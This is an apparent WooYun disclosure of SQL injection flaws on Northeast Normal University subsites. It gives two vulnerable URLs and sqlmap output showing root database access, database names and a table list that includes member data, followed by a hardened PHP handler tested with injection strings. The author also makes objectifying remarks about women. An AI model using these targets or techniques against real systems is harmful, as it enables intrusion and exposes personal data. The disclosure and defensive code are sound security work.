WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
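2015-06-26: Details reported to the vendor; awaiting vendor response
2015-07-01: The vendor actively ignored the vulnerability; details disclosed to the public
It's university graduation season, and normal universities have lots of girls. You don't know until you look, and once you look you get a shock.
Vulnerable URL: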
http://subsite.nenu.edu.cn/qnn/questionnaire.php?cs=8295
web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user is DBA: True

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
root privileges
web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [6]:
[*] gallery
[*] geyx
[*] information_schema
[*] mysql
[*] nenunew
[*] wurfl

web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: nenunew
[64 tables]
+----------------------+
| E$_nenu_urp          |
| SNP_CHECK_TAB        |
| adminuser            |
| columny              |
| daily_scorea         |
| daily_scoreb         |
| liiuy                |
| nenu_academic        |
| nenu_addon22         |
| nenu_addon23         |
| nenu_addonacademic   |
| nenu_addonbasic      |
| nenu_addonlaw        |
| nenu_addonlinks      |
| nenu_addonnews       |
| nenu_addonnotice     |
| nenu_addonxwgk       |
| nenu_admin           |
| nenu_admintype       |
| nenu_arcatt          |
| nenu_archives        |
| nenu_archives22      |
| nenu_archives23      |
| nenu_arcrank         |
| nenu_arctype         |
| nenu_basic           |
| nenu_cache_tagindex  |
| nenu_calendary       |
| nenu_channeltype     |
| nenu_full_search     |
| nenu_guest           |
| nenu_homepageset     |
| nenu_ip              |
| nenu_keywords        |
| nenu_law             |
| nenu_links           |
| nenu_log             |
| nenu_member          |
| nenu_news            |
| nenu_notice          |
| nenu_qanswer         |
| nenu_qcommit         |
| nenu_qquestion       |
| nenu_qresponese      |
| nenu_qsurvey         |
| nenu_search_cache    |
| nenu_search_keywords |
| nenu_search_rule     |
| nenu_smalltypes      |
| nenu_sysconfig       |
| nenu_syspassport     |
| nenu_tag_index       |
| nenu_tag_list        |
| nenu_uploads         |
| nenu_urp             |
| nenu_xwgk            |
| newnotice            |
| pro_score            |
| professor_en         |
| professorinfo        |
| rate                 |
| rizhi                |
| staff                |
| yut                  |
+----------------------+
The nenu_member table also contains sensitive information.
This subsite also has a SQL injection: http://kyc.nenu.edu.cn/res_ex_s.asp?nclass=15
Filter SQL input and protect the future teachers' information~ (especially the pretty teachers!!)
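A hardened handler for an integer parameter such as cs, as an added example that is not part of the original report or the site's code. It assumes that nenu_qsurvey is the table behind the parameter and that it has id and title columns; an in-memory SQLite database with constructed rows stands in for MySQL so the script runs offline.

```php
<?php
// Added example, not the site's code. Assumed: nenu_qsurvey is the table behind
// `cs`, and its column names. SQLite in memory stands in for MySQL so it runs offline.

function parse_survey_id($raw)
{
    // Allow-list: 1 to 9 decimal digits. Anything else is rejected, not "cleaned".
    if (!is_string($raw) || !preg_match('/\A[1-9][0-9]{0,8}\z/', $raw)) {
        return null;
    }
    return (int) $raw;
}

function load_survey(PDO $pdo, $id)
{
    // Placeholder binding: the value is sent as data and never joins the SQL text.
    $stmt = $pdo->prepare('SELECT id, title FROM nenu_qsurvey WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

function handle_request(PDO $pdo, $rawCs)
{
    $id = parse_survey_id($rawCs);
    if ($id === null) {
        return array(400, 'Invalid survey id');
    }
    try {
        $row = load_survey($pdo, $id);
    } catch (PDOException $e) {
        error_log('survey lookup failed: ' . $e->getMessage());
        return array(500, 'Temporary error'); // no SQL error text reaches the client
    }
    if ($row === false) {
        return array(404, 'Survey not found');
    }
    return array(200, htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8'));
}
// Constructed sample data. On MySQL, connect with an account granted SELECT on
// this table only (not root@localhost) and set PDO::ATTR_EMULATE_PREPARES to false.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE nenu_qsurvey (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO nenu_qsurvey VALUES (8295, 'Graduate survey')");
foreach (array('8295', '8296', '8295 OR 1=1', "8295'") as $cs) {
    list($status, $body) = handle_request($pdo, $cs);
    printf("%-14s -> %d %s\n", $cs, $status, $body);
}
```

Only the first constructed input returns 200; the unknown id returns 404 and the two malformed values return 400 without reaching the database.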
Severity: No impact, ignored by vendor
Ignored at: 2015-07-01 11:22
None yet